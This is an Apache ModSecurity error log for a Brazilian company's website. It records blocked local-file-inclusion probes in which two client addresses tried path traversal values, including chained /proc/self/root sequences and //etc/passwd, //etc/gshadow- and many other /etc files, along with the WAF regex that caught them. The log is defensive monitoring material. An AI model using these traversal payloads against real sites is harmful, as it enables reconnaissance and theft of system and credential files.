[Fri Mar 20 07:39:08.960356 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:59256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jzPqxLDW4GITHUkTi3QAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:39:21.687107 2026] [:error] [pid 11642:tid 140411691570944] [client 216.73.216.191:17746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2bninkcc-iUj5Apa1QAAA4Y"]
[Fri Mar 20 07:39:21.839028 2026] [:error] [pid 11642:tid 140411666392832] [client 216.73.216.191:17746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2bninkcc-iUj5Apa1gAAA4k"]
[Fri Mar 20 07:39:21.867078 2026] [:error] [pid 15826:tid 140411557287680] [client 216.73.216.191:35225] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2eoXxyEfFpUF8f99jAAAAVY"]
[Fri Mar 20 07:39:21.870931 2026] [:error] [pid 11642:tid 140411658000128] [client 216.73.216.191:50463] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2bninkcc-iUj5Apa1wAAA4o"]
[Fri Mar 20 07:39:21.911607 2026] [:error] [pid 10189:tid 140411548894976] [client 216.73.216.191:59262] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2TJ3M9BSuKP7CAYWvwAAAJc"]
[Fri Mar 20 07:39:21.913767 2026] [:error] [pid 11642:tid 140411540502272] [client 216.73.216.191:50765] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2bninkcc-iUj5Apa2AAAA5g"]
[Fri Mar 20 07:39:21.947893 2026] [:error] [pid 31215:tid 140411691570944] [client 216.73.216.191:5792] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2QF0L0L-SsrnPo5k0gAAAsY"]
[Fri Mar 20 07:39:21.992474 2026] [:error] [pid 11642:tid 140411716749056] [client 216.73.216.191:17746] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2bninkcc-iUj5Apa2QAAA4M"]
[Fri Mar 20 07:39:22.012495 2026] [:error] [pid 11642:tid 140411674785536] [client 216.73.216.191:50463] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2rninkcc-iUj5Apa2gAAA4g"]
[Fri Mar 20 07:39:22.101355 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k0wAAAso"]
[Fri Mar 20 07:39:22.203342 2026] [:error] [pid 31215:tid 140411624429312] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k1AAAAs4"]
[Fri Mar 20 07:39:22.303628 2026] [:error] [pid 31215:tid 140411674785536] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k1QAAAsg"]
[Fri Mar 20 07:39:22.406096 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k1gAAAsc"]
[Fri Mar 20 07:39:22.514877 2026] [:error] [pid 31215:tid 140411574073088] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k1wAAAtQ"]
[Fri Mar 20 07:39:22.607833 2026] [:error] [pid 31215:tid 140411733534464] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k2AAAAsE"]
[Fri Mar 20 07:39:22.708452 2026] [:error] [pid 31215:tid 140411649607424] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k2QAAAss"]
[Fri Mar 20 07:39:22.814897 2026] [:error] [pid 31215:tid 140411741927168] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k2gAAAsA"]
[Fri Mar 20 07:39:22.912249 2026] [:error] [pid 31215:tid 140411641214720] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2gF0L0L-SsrnPo5k3AAAAsw"]
[Fri Mar 20 07:39:23.019741 2026] [:error] [pid 31215:tid 140411699963648] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2wF0L0L-SsrnPo5k3QAAAsU"]
[Fri Mar 20 07:39:23.117244 2026] [:error] [pid 31215:tid 140411540502272] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2wF0L0L-SsrnPo5k3gAAAtg"]
[Fri Mar 20 07:39:24.589318 2026] [:error] [pid 31215:tid 140411666392832] [client 216.73.216.191:5792] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2wF0L0L-SsrnPo5k4AAAAsk"]
[Fri Mar 20 07:39:24.591140 2026] [:error] [pid 15826:tid 140411607643904] [client 216.73.216.191:35225] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2-oXxyEfFpUF8f99kAAAAVA"]
[Fri Mar 20 07:39:24.592554 2026] [:error] [pid 10189:tid 140411607643904] [client 216.73.216.191:59262] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2zJ3M9BSuKP7CAYWwgAAAJA"]
[Fri Mar 20 07:39:24.603493 2026] [:error] [pid 11642:tid 140411557287680] [client 216.73.216.191:50765] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j27ninkcc-iUj5Apa3wAAA5Y"]
[Fri Mar 20 07:39:24.603749 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:32671] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j3AF0L0L-SsrnPo5k4QAAAs0"]
[Fri Mar 20 07:39:24.605008 2026] [:error] [pid 11642:tid 140411641214720] [client 216.73.216.191:50463] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j27ninkcc-iUj5Apa3QAAA4w"]
[Fri Mar 20 07:39:24.605352 2026] [:error] [pid 31215:tid 140411590858496] [client 216.73.216.191:1118] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0j2wF0L0L-SsrnPo5k3wAAAtI"]
